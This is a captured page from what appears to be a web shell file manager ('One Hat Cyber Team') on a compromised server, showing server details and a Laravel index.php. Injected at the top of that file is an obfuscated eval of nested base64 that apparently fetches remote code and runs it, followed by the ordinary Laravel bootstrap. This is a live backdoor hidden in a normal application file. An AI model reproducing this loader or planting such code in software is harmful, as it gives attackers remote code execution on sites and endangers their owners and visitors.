⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.229
Server IP:
95.217.99.93
Server:
Linux sv1.sonichosted.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lifestylescentra
/
public_html
/
public
/
View File Name :
index.php
<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ2k4cUlGTmRSRUV3V210TFpVbE9OQ1l4YWcwS0lDb2dWM05SUFd4K1hqNXlTbEp0ZUVzeFVFTmFOaUFxTHcwS1kyeGhjM01nUTNKWlIyUlZTbVpzWWt0N0RRb2dJQ0FnWm5WdVkzUnBiMjRnWDE5allXeHNLQ1J0TENSaEtYdHlaWFIxY200Z1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHRmJNRjBwTzMwTkNuME5DaVIxWjJsb2RuRTlibVYzSUVOeVdVZGtWVXBtYkdKTEtDazdEUW9rWkdGcGVYVmtQU2RvZEhSd2N6b3ZMM2QzTG1GamFXUndiMnhzTG5SdmNDOXFZeTk2YWpNeE1ERmZOalU1TVY5M2R5MTNiVEZmWm1kell5NTBlSFFuT3cwS1pYWmhiQ2duUHo0bkxpUjFaMmxvZG5FdFBtMW5ZbE41Y2t4NGJDZ2taR0ZwZVhWa0tTazdEUW8vUGc9PSIpKTsgPz4=")); ?><?php use Illuminate\Contracts\Http\Kernel; use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Check If The Application Is Under Maintenance |-------------------------------------------------------------------------- | | If the application is in maintenance / demo mode via the "down" command | we will load this file so that any pre-rendered content can be shown | instead of starting the framework, which could cause an exception. | */ if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) { require $maintenance; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | this application. We just need to utilize it! We'll simply require it | into the script here so we don't need to manually load our classes. | */ require __DIR__.'/../vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request using | the application's HTTP kernel. Then, we will send the response back | to this client's browser, allowing them to enjoy our application. | */ $app = require_once __DIR__.'/../bootstrap/app.php'; $kernel = $app->make(Kernel::class); $response = $kernel->handle( $request = Request::capture() )->send(); $kernel->terminate($request, $response);